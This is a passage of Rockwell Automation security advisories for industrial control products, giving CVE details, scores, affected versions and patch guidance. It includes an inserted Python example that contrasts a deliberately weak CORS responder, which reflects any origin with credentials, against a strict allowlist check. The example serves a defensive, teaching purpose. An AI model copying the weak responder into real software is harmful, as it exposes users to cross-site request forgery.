Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate environment specific prioritization.

Risk Mitigation & User Action

Customers using the affected versions are encouraged to apply the below risk mitigations and implement our suggested security best practices to minimize risk of this vulnerability in their environments.
  • Update to the latest version of Armor™ PowerFlex® (2.001 or later).
  • Implement QA43240 - Recommended Security Guidelines from Rockwell Automation.

Additional Resources

  • JSON CVE-2023-2423

High
PN1634 | PN1634 | Kinetix® 5700 DC Bus Power Supply Series A – CIP Message Attack Could Cause Denial-Of-Service
Published Date:
July 18, 2023
Last Updated:
July 18, 2023
CVE IDs:
CVE-2023-2263
Products:
2198 Kinetix 5700 Drive
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History

Revision Number | Revision History
1.0 | Version 1.0 – July 18, 2023

Affected Products

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
Kinetix® 5700 DC Bus Power Supply – Series A | V13.001 | V13.003

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.  The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-2263 IMPACT
The Kinetix 5700 DC Bus Power Supply Series A is vulnerable to CIP fuzzing. New ENIP connections cannot be established if the device is impacted by this vulnerability, which prohibits the operational capabilities of the device, resulting in a denial-of-service condition.

CVSS Base Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-400: Uncontrolled Resource Consumption


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations below, if possible.
  • Upgrade to V13.003 or later which has been patched to mitigate these issues.
  • For information on how to mitigate Security Risks on industrial automation control systems (IACS) networks see the following publications:
    • System Security Design Guidelines Reference Manual publication, SECURE-RM001
    • Configure System Security Features User Manual, SECURE-UM001
  • Additionally, we encourage the customer to implement our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risk of the vulnerability.

Additional Resources

  • CVE-2023-2263 JSON

High
PN1635 | PN1635 | ThinManager® ThinServer™ Path Traversal Vulnerability
Published Date:
July 18, 2023
Last Updated:
July 18, 2023
CVE IDs:
CVE-2023-2913
Products:
ThinManager
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History

Revision Number | Revision History
1.0 | Version 1.0 – July 18, 2023

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
ThinManager® ThinServer™ | 13.0.0 - 13.0.2 | 13.0.3 or later
ThinManager® ThinServer™ | 13.1.0 | 13.1.1 or later

Vulnerability Details

A vulnerability was discovered by Security Researchers at Flashpoint.io and reported to Rockwell Automation. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-2913 IMPACT
An executable used in the affected products can be configured to enable an API feature in the HTTPS Server Settings. This feature is disabled by default. When the API is enabled and handling requests, a path traversal vulnerability exists that allows a remote actor to leverage the privileges of the server's file system and read arbitrary files stored in it. A malicious user could exploit this vulnerability by supplying a path that contains manipulated variables.

CVSS Base Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE-23 Relative Path Traversal


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the potential risk of vulnerability.
  • Update to the corrected software versions.
  • Disable the API feature and use a service account with appropriate access for the application.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-2913 JSON
  • QA60051 - ThinManager : Download Patches and Updates

High
PN1633 | PN1633 | Remote Code Execution and Denial-of-Service Vulnerabilities in Select Communication Modules
Published Date:
July 12, 2023
Last Updated:
July 12, 2023
CVE IDs:
CVE-2023-3596, CVE-2023-3595
Products:
Comms Modules
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History

Revision Number | Revision History
1.0 | Version 1.0 – July 12, 2023

Executive Summary

Rockwell Automation, in coordination with the U.S. government, has analyzed a novel exploit capability attributed to Advanced Persistent Threat (APT) actors affecting select communication modules. We are not aware of current exploitation leveraging this capability, and intended victimization remains unclear. Previous threat actor cyber activity involving industrial systems suggests a high likelihood that these capabilities were developed with an intent to target critical infrastructure and that the victim scope could include international customers. Threat activity is subject to change, and customers using affected products could face serious risk if exposed.

Rockwell Automation has provided patches for all affected products, including hardware series that were out of support. Detection rules have also been provided.

Exploitation of these vulnerabilities could allow malicious actors to gain remote access to the running memory of the module and perform malicious activity, such as manipulating the module's firmware, inserting new functionality into the module, wiping the module's memory, falsifying traffic to/from the module, establishing persistence on the module, and potentially affecting the underlying industrial process. This could result in destructive actions where vulnerable modules are installed, including in critical infrastructure.

Customers using the affected products are strongly encouraged to evaluate and implement the mitigations provided below. Additional details relating to the discovered vulnerabilities, including the products in scope, impact, and recommended countermeasures, are provided below.

Affected Products

Catalog | Series | Versions
1756-EN2T, 1756-EN2TK, 1756-EN2TXT | A, B, C | <=5.008 & 5.028
1756-EN2T, 1756-EN2TK, 1756-EN2TXT | D | <=11.003
1756-EN2TP, 1756-EN2TPK, 1756-EN2TPXT | A | <=11.003
1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT | A, B | <=5.008 & 5.028
1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT | C | <=11.003
1756-EN2F, 1756-EN2FK | A, B | <=5.008 & 5.028
1756-EN2F, 1756-EN2FK | C | <=11.003
1756-EN3TR, 1756-EN3TRK | A | <=5.008 & 5.028
1756-EN3TR, 1756-EN3TRK | B | <=11.003
1756-EN4TR, 1756-EN4TRK, 1756-EN4TRXT | A | <=5.001

Vulnerability Details

CVE-2023-3595
Where this vulnerability exists in the 1756 EN2* and 1756 EN3* products, it could allow a malicious user to perform remote code execution with persistence on the target system through maliciously crafted CIP messages. This includes the ability to modify, deny, and exfiltrate data passing through the device.

CVSS score: 9.8/10 (Critical)
CVSS vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787: Out-of-bounds Write


CVE-2023-3596
Where this vulnerability exists in the 1756-EN4* products, it could allow a malicious user to cause a denial of service by asserting the target system through maliciously crafted CIP messages.

CVSS Score: 7.5/10 (High)
CVSS vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-787: Out-of-bounds Write

Risk Mitigation & User Action

These vulnerabilities can be addressed by performing a standard firmware update. Customers are strongly encouraged to implement the risk mitigations provided below and to the extent possible, to combine these with the QA43240 - Recommended Security Guidelines from Rockwell Automation to employ multiple strategies simultaneously.
Catalog | Series | Affected Versions | Remediations
1756-EN2T, 1756-EN2TK, 1756-EN2TXT | A, B, C | <=5.008 & 5.028 | Update to 5.029 or later for signed versions (**recommended); update to 5.009 for unsigned versions
1756-EN2T, 1756-EN2TK, 1756-EN2TXT | D | <=11.003 | Update to 11.004 or later
1756-EN2TP, 1756-EN2TPK, 1756-EN2TPXT | A | <=11.003 | Update to 11.004 or later
1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT | A, B | <=5.008 & 5.028 | Update to 5.029 or later for signed versions (**recommended); update to 5.009 for unsigned versions
1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT | C | <=11.003 | Update to 11.004 or later
1756-EN2F, 1756-EN2FK | A, B | <=5.008 & 5.028 | Update to 5.029 or later for signed versions (**recommended); update to 5.009 for unsigned versions
1756-EN2F, 1756-EN2FK | C | <=11.003 | Update to 11.004 or later
1756-EN3TR, 1756-EN3TRK | A | <=5.008 & 5.028 | Update to 5.029 or later for signed versions (**recommended); update to 5.009 for unsigned versions
1756-EN3TR, 1756-EN3TRK | B | <=11.003 | Update to 11.004 or later
1756-EN4TR, 1756-EN4TRK, 1756-EN4TRXT | A | <=5.001 | Update to 5.002 or later
** Rockwell Automation strongly recommends updating to signed firmware if possible. Once the module is updated to signed firmware (example 5.008 to 5.029), it is not possible to revert to unsigned firmware versions.

Mitigations

Organizations should take the following actions to further secure ControlLogix communications modules from exploitation.
  • Update firmware. Update EN2* ControlLogix communications modules to firmware revision 11.004 and update EN4* ControlLogix communications modules to firmware revision 5.002.
  • Properly segment networks. Given a cyber actor would require network connectivity to the communication module to exploit the vulnerability, organizations should ensure ICS/SCADA networks are properly segmented within the process structure as well as from the Internet and other non-essential networks.
  • Implement detection signatures. Use appended Snort signatures to monitor and detect anomalous Common Industrial Protocol (CIP) packets to Rockwell Automation devices.
Additionally, organizations should increase protections of ICS/SCADA networks by implementing at least the following mitigations:
  • Regularly back up devices to allow for reversion to a clean copy of firmware or a working project;
  • disable unused CIP objects on communications modules, such as unused CIP Email and Socket Objects;
  • block all traffic to CIP-enabled devices from outside the ICS/SCADA network using available security products; and
  • monitor CIP traffic for unexpected content or unusual packet lengths.

Potential Indicators of Compromise

System owners should ensure ICS/SCADA networks are baselined and regularly monitored for deviations in network activity. Specifically, system owners can look for the following potential IOCs (Indicators of Compromise) for ControlLogix communications modules:
  • Unknown scanning on a network for Common Industrial Protocol (CIP)-enabled devices.
  • Unexpected or out-of-specification CIP packets to CIP objects implemented in ControlLogix communications modules, including the Email Object and non-public vendor-specified objects.
  • Arbitrary writes to communication module memory or firmware.
  • Unexpected firmware updates.
  • Unexpected disabling of secure boot options.
  • Uncommon firmware file names.

Detection Rules

The following Snort rules are intended to be run on a computer with network visibility of a ControlLogix communications module and can be used to detect traffic to a ControlLogix communications module that does not conform to the CIP specification as provided by ODVA (Open DeviceNet Vendors Association). While both the CIP Email and Socket Objects are capable of communicating over a network, they are intended to communicate over the backplane of a ControlLogix PLC (Programmable Logic Controller) and therefore should not be seen over the network. However, it is possible that site engineers could configure a communications module such that there is legitimate network traffic to and from CIP Email and Socket Objects, potentially resulting in false positives.

Snort 2 Rules and Snort 3 Rules are both attached below.

References

  • CVE-2023-3595 JSON
  • CVE-2023-3596 JSON
Attachments

  • CVE-2023-3595 Snort 2.rules
  • CVE-2023-3595 Snort 3.rules

Critical
PN1630 | PN1630 | Enhanced HIM Vulnerable to Cross Site Request Forgery Attack
Published Date:
July 11, 2023
Last Updated:
September 09, 2025
CVE IDs:
CVE-2023-2746
Products:
PowerFlex 7000, PowerFlex 6000
CVSS Scores:
9.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

 

Revision Number
1.1
Revision History
Version 1.0 - July 11, 2023
Version 1.1 - September 9, 2025

Affected Products

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
Enhanced HIM | v1.001 | v1.002

Security Issue Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess the security issues. The security of our products is important to us as your industrial automation supplier. This issue was found internally during routine testing and is being reported based on our commitment to transparency and to improvement of all business environments.

CVE-2023-2746 IMPACT
The API that the application uses is not protected sufficiently and uses incorrect Cross-Origin Resource Sharing (CORS) settings. As a result, it is vulnerable to a Cross Site Request Forgery (CSRF) attack. To exploit this, a threat actor would have to convince a user to click on an untrusted link, either through a social engineering attack or by performing a Cross Site Scripting (XSS) attack. A successful CSRF could lead to sensitive information disclosure and full remote access to the affected products.

CVSS Base Score: 9.6/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CWE: CWE-352: Cross-Site Request Forgery (CSRF)


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Risk Mitigation & User Action

Customers using the affected software should use risk mitigation and our suggested security best practices to minimize the potential risks.
  • Upgrade to version 1.002 which mitigates this issue.
  • Security Best Practices: QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-2746 JSON

Glossary

Application Programming Interface: (API) is a set of protocols and tools that allow different software applications to communicate with each other.

Cross-Origin Resource Sharing: (CORS) an HTTP-header-based mechanism that allows a server to specify which origins (domains, schemes, or ports) are permitted to access its resources

Cross Site Request Forgery: (CSRF) an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated 

Cross Site Scripting Vulnerability: (XSS) a web security vulnerability that allows an attacker to inject malicious scripts into content from otherwise trusted websites

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

 

High
PN1631 | PN1631 | PowerMonitor™ 1000 – Cross-Site Scripting Vulnerability
Published Date:
July 11, 2023
Last Updated:
September 09, 2025
CVE IDs:
CVE-2023-2072
Products:
1408 PowerMonitor 1000
CVSS Scores:
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

 

Revision Number
1.1
Revision History
Version 1.0 – July 11, 2023
Version 1.1 - September 9, 2025

Affected Products

Affected Product | First Known in Software Revision | Corrected in Software Revision
PowerMonitor™ 1000 | V4.011 | V4.019

Security Issue Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess the security issues. The security of our products is important to us as your industrial automation supplier. This issue was found internally during routine testing and is being reported based on our commitment to transparency and to improving business environments.

CVE-2023-2072 IMPACT
The PowerMonitor 1000 contains stored cross site scripting security issues within the web page of the product. The pages do not require privileges to access and can be injected with code by an attacker. This could be used to leverage an attack on an authenticated user. The result could be remote code execution and the complete loss of confidentiality, integrity, and availability of the product.

CVSS Base Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-787 Out-Of-Bounds Write


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Risk Mitigation & User Action

Customers using the affected software should use the risk mitigation and our suggested security best practices below to minimize the potential risks.
  • Upgrade to V4.019 which has been patched to mitigate these issues.
  • Security Best Practices: QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risks.

Additional Resources

  • CVE-2023-2072 JSON

Glossary

Cross Site Scripting Vulnerability: (XSS) a web security vulnerability that allows an attacker to inject malicious scripts into content from otherwise trusted websites

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

 

High
PN1627 | PN1627 | FactoryTalk® System Services affecting FactoryTalk® Policy Manager – Multiple Vulnerabilities
Published Date:
June 13, 2023
Last Updated:
September 09, 2025
CVE IDs:
CVE-2023-2639, CVE-2023-2637, CVE-2023-2638
Products:
FactoryTalk Policy Manager, FactoryTalk System Services, FactoryTalk Services Platform
CVSS Scores:
4.1, 5.9, 7.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

 

Revision Number
1.1
Revision History
Version 1.0 - June 13, 2023
Version 1.1 - September 9, 2015 - Updated for better readability

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® Services Platform* | 6.11.00 | 6.30.00

* Only if the following were installed:
  • FactoryTalk® Policy Manager v6.11.0
  • FactoryTalk® System Services v6.11.0

Security Issue Details

Rockwell Automation received a report from Claroty regarding three security issues in FactoryTalk® System Services. If used, these security issues could result in information disclosure, loading of malicious configuration files, or the elevation of privileges from a user to an administrator.

FactoryTalk® Policy Manager is dependent upon FactoryTalk® System Services and both components must be installed together. Rockwell Automation uses the latest version of the CVSS scoring system to assess security issues.

CVE-2023-2637 IMPACT
A hard-coded cryptographic key may lead to privilege escalation. FactoryTalk® System Services uses a hard-coded cryptographic key to generate administrator cookies. This security issue could allow a local, authenticated non-admin user to generate an invalid administrator cookie. This would give them administrative privileges to the FactoryTalk® Policy Manager database. This would allow the threat actor to make harmful changes to the database. The changes would then be used when a legitimate FactoryTalk® Policy Manager user deploys a security policy model. User interaction is required for this security issue to be successfully used.

CVSS Base Score: 7.3
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:H
CWE: CWE-321: Use of Hard-coded Cryptographic Key


Known Exploited Vulnerability (KEV) database: No

CVE-2023-2638 IMPACT
An improper authorization in FTSSBackupRestore.exe could lead to the loading of harmful configuration archives. FactoryTalk® System Services does not verify that a backup configuration archive is password protected. This security issue could allow a local, authenticated non-admin user to craft a harmful backup archive. This archive would not have password protection and would be loaded by FactoryTalk® System Services as a valid backup when a restore procedure takes place. User interaction is required for this security issue to be used.

CVSS Base Score: 5.9
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H
CWE: CWE-287: Improper Authentication


Known Exploited Vulnerability (KEV) database: No

CVE-2023-2639 IMPACT
An origin validation error may lead to information disclosure. There is an underlying feedback mechanism of FactoryTalk® System Services that transfers the FactoryTalk® Policy Manager rules to relevant devices on the network. This mechanism does not verify that the origin of the communication is a legitimate local client device. It could allow a threat actor to create a harmful website that serves a harmful script. The script can connect to the local WebSocket endpoint and wait for events as if it were a valid client device. If used, a threat actor could receive information including whether FactoryTalk® Policy Manager is installed. It could also allow the threat actor to view the entire security policy. User interaction is required for this to be used.

CVSS Base Score: 4.1
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N
CWE: CWE-346: Origin Validation Error


Known Exploited Vulnerability (KEV) database: No
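
Both the incorrect CORS settings described for the Enhanced HIM API (CVE-2023-2746, PN1630 above) and the WebSocket origin validation error in CVE-2023-2639 come down to a server trusting whatever Origin a browser presents. The following added example, which is not code from Rockwell Automation or from either advisory, contrasts a CORS responder that reflects any Origin with a strict allowlist check and applies the same check to a WebSocket upgrade; the allowlist entries and host names are constructed for the example.

```python
from urllib.parse import urlsplit

# Constructed allowlist for this example (not a Rockwell value): the origins
# the operator actually serves the web UI from.  A deployment would load this
# from configuration rather than hard-coding it.
ALLOWED_ORIGINS = frozenset({
    "https://him.plant.example",   # hypothetical HMI host name
    "https://localhost:8443",
})


def weak_cors_headers(request_headers):
    """Weak responder: echoes whatever Origin the browser sent and also
    allows credentials.  Cookies ride along on the cross-site request and
    the calling page is allowed to read the response, so any site the
    logged-in user visits can drive the API as that user (the CSRF case)."""
    origin = request_headers.get("Origin")
    if origin is None:
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
    }


def origin_allowed(origin, allowlist=ALLOWED_ORIGINS):
    """Strict check: the Origin must be exactly one allowlisted
    scheme://host[:port].  A missing Origin, the opaque 'null' origin,
    origins carrying a path, and look-alike host names are all rejected."""
    if not origin or origin == "null":
        return False
    parts = urlsplit(origin)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    if parts.path not in ("", "/") or parts.query or parts.fragment:
        return False
    # Compare only scheme and host[:port]; host names are case-insensitive.
    return f"{parts.scheme}://{parts.netloc}".lower() in allowlist


def strict_cors_headers(request_headers):
    """Hardened responder.  Unknown origins get no CORS headers at all, so
    the browser withholds the response from the calling page.  Vary: Origin
    keeps shared caches from replaying one origin's answer to another."""
    origin = request_headers.get("Origin")
    if not origin_allowed(origin):
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }


def accept_websocket_upgrade(request_headers):
    """The same check applied to a WebSocket handshake.  Browsers send Origin
    on the upgrade request, so a script loaded from an arbitrary site cannot
    attach to the local endpoint and collect its events unless its origin is
    on the allowlist.  A missing Origin is refused here as well."""
    return origin_allowed(request_headers.get("Origin"))


if __name__ == "__main__":
    # Constructed request headers: one from the legitimate UI, one from a page
    # on some other site that the user opened while still logged in.
    legit = {"Origin": "https://him.plant.example", "Cookie": "session=abc"}
    other = {"Origin": "https://other-site.example", "Cookie": "session=abc"}
    print("weak   :", weak_cors_headers(other))          # reflects other-site.example
    print("strict :", strict_cors_headers(other))        # {}
    print("strict :", strict_cors_headers(legit))        # allows him.plant.example
    print("ws     :", accept_websocket_upgrade(other))   # False
```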

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Risk Mitigation & User Action

Customers using the affected software should use the risk mitigations and security best practices below.
  • Upgrade to 6.30.00 or later which has been patched to mitigate these issues.
  • For information on how to mitigate Security Risks on industrial automation control systems (IACS) networks see the following publications:
    • System Security Design Guidelines Reference Manual publication, SECURE-RM001
    • Configure System Security Features User Manual, SECURE-UM001
  • Implement our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risks.

Additional Resources

  • CVE-2023-2637 JSON
  • CVE-2023-2638 JSON
  • CVE-2023-2639 JSON
 

Glossary

Application Programming Interface: (API) is a set of protocols and tools that allow different software applications to communicate with each other.

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Medium Strength Ciphers: encryption methods that use key lengths of at least 64 bits and less than 112 bits, or those with key lengths of at least 56 bits and less than 112 bits

 

High
PN1628 | PN1628 | Apache Portable Runtime Vulnerability in FactoryTalk® Edge Gateway
Published Date:
June 13, 2023
Last Updated:
September 09, 2025
CVE IDs:
CVE-2021-35940, CVE-2017-12613
Products:
FactoryTalk Edge Gateway
CVSS Scores:
7.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

 

Revision Number
1.1
Revision History
Version 1.0 - June 13, 2023
Version 1.1 - September 9, 2025 - Updated for readability

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® Edge Gateway | v1.03.00 | v1.04.00

Security Issue Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess security issues. The security of our products is important to us as your industrial automation supplier. This irregularity was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving production environments.

CVE-2021-35940 IMPACT
An out-of-bounds array read security issue was fixed in the apr_time_exp*() functions in the Apache Portable Runtime v1.6.3 (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, causing version 1.7.0 to regress compared to 1.6.3; it is therefore vulnerable to the same issue. If exploited, a threat actor could potentially read confidential data or cause the software to become unavailable.

CVSS Base Score: 7.1
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
CWE: CWE-125 Out-of-bounds Read


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.

Risk Mitigation & User Action

Customers using the affected software should use the risk mitigation below and our security best practices to minimize the risks.
  • Update to v1.04.00 which mitigates the issue.
  • Security Best Practices: QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2021-35940 JSON

High
PN1629 | PN1629 | Denial-of-Service Vulnerability in FactoryTalk® Transaction Manager
Published Date:
June 13, 2023
Last Updated:
September 26, 2025
CVE IDs:
CVE-2023-2778
Products:
FactoryTalk Transaction Manager
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

 

Revision Number
1.1
Revision History
Version 1.0 - June 13, 2023
Version 1.1 - September 26, 2025

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® Transaction Manager | <=v13.10 | BF29042 - Patch: Multiple issues, FactoryTalk Transaction Manager 13.00/13.10

Security Issue Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess security issues. The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to full transparency and the improvement of all business environments.

CVE-2023-2778 IMPACT
A denial-of-service (DoS) security issue exists in the affected products. This security issue can be used by sending a modified packet to port 400. If used, the application could crash or experience a high CPU or memory usage condition. This would cause intermittent application functionality issues. The application would need to be restarted to recover from the DoS.

CVSS Base Score 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-400 Uncontrolled Resource Consumption


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.

Risk Mitigation & User Action

Customers using the affected software should use the risk mitigations and our suggested security best practices below to minimize the risks.
  • Customers should follow the instructions in BF29042 - Patch: Multiple issues, FactoryTalk Transaction Manager 13.00/13.10 to install the patch to mitigate the issue.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-2778 JSON

Glossary

Central Processing Unit: (CPU) the brain of your computer, processing instructions from programs and components

Denial-of-Service: malicious attempt to overwhelm a web property with traffic in order to disrupt its normal operations

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited 

 

High
PN1625 | PN1625 | Inadequate Encryption Vulnerability in ThinManager®
Published Date:
May 12, 2023
Last Updated:
September 09, 2025
CVE IDs:
CVE-2023-2443
Products:
ThinManager
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

 

Revision Number
1.2
Revision History
Version 1.0 - May 11, 2023
Version 1.1 - May 12, 2023 – Updated First Known in Software Version
Version 1.2 - September 9, 2025 - Updated for readability

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
ThinManager® | v13.0.0 and v13.0.1 | v13.0.2

Security Issue Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess the security issues.

CVE-2023-2443 IMPACT
The affected product allows use of medium strength ciphers. If the client requests an insecure cipher, a threat actor could decrypt traffic sent between the client and the server Application Programming Interface (API).

CVSS Base Score: 7.5/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: Inadequate Encryption Strength


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.

Risk Mitigation & User Action

Customers using the affected software should use the risk mitigations and our suggested security best practices found below to minimize risks.
  • Upgrade to v13.0.2.
  • Do not use 3DES encryption algorithm.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-2443 JSON
  • QA60051 - ThinManager : Download Patches and Updates
  • QA66518 - ThinManager: How to Ensure 3DES Encryption Algorithm is Not Used

Glossary

Application Programming Interface: (API) is a set of protocols and tools that allow different software applications to communicate with each other.

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Medium Strength Ciphers: encryption methods that use key lengths of at least 64 bits and less than 112 bits, or those with key lengths of at least 56 bits and less than 112 bits

 

High
PN1622 | PN1622 | ArmorStart® ST 281E, 284EE Vulnerable to Multiple XSS Vulnerabilities
Published Date:
May 11, 2023
Last Updated:
September 08, 2025
CVE IDs:
CVE-2023-29030, CVE-2023-29022, CVE-2023-29028, CVE-2023-29027, CVE-2023-29023, CVE-2023-29026, CVE-2023-29029, CVE-2023-29031, CVE-2023-29024, CVE-2023-29025
Products:
ArmorStart
CVSS Scores:
4.7, 7.0, 5.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

 

Revision Number
1.1
Revision History
Version 1.0 - May 11, 2023
Version 1.1 - September 8, 2025 - Updated for better readability

Affected Products

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
ArmorStart® ST 281E | v2.004.06 | N/A
ArmorStart® ST 284E | all | N/A
ArmorStart® ST 280E | all | N/A

Security Issue Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following security issues.

CVE-2023-29031 IMPACT
A cross site scripting security issue was discovered. This could allow a threat actor to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful use of this.

CVSS Base Score: 7.0
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-20 Improper Input Validation


Known Exploited Vulnerability (KEV) database: No

CVE-2023-29030 IMPACT
A cross site scripting security issue was discovered. This could allow a threat actor to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful use of this.

CVSS Base Score: 7.0 (High)
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-20 Improper Input Validation


Known Exploited Vulnerability (KEV) database: No

CVE-2023-29023 IMPACT
A cross site scripting security issue was discovered. This could allow a threat actor to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful use of this.

CVSS Base Score: 7.0 (High)
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-20 Improper Input Validation


Known Exploited Vulnerability (KEV) database: No

CVE-2023-29024 IMPACT
A cross site scripting vulnerability was discovered. This could allow a threat actor to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful exploitation of this.

CVSS Base Score: 5.5 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation


Known Exploited Vulnerability (KEV) database: No

CVE-2023-29025 IMPACT
A cross site scripting security issue was discovered. This could allow a threat actor with admin privileges and network access to view user data and modify the web interface. This could also cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation


CVE-2023-29026 IMPACT
A cross site scripting security issue was discovered. This could allow a threat actor with admin privileges and network access to view user data and modify the web interface. This could also cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation


CVE-2023-29027 IMPACT
A cross site scripting security issue was discovered. This could allow a threat actor with admin privileges and network access to view user data and modify the web interface. This could also cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation


CVE-2023-29028 IMPACT
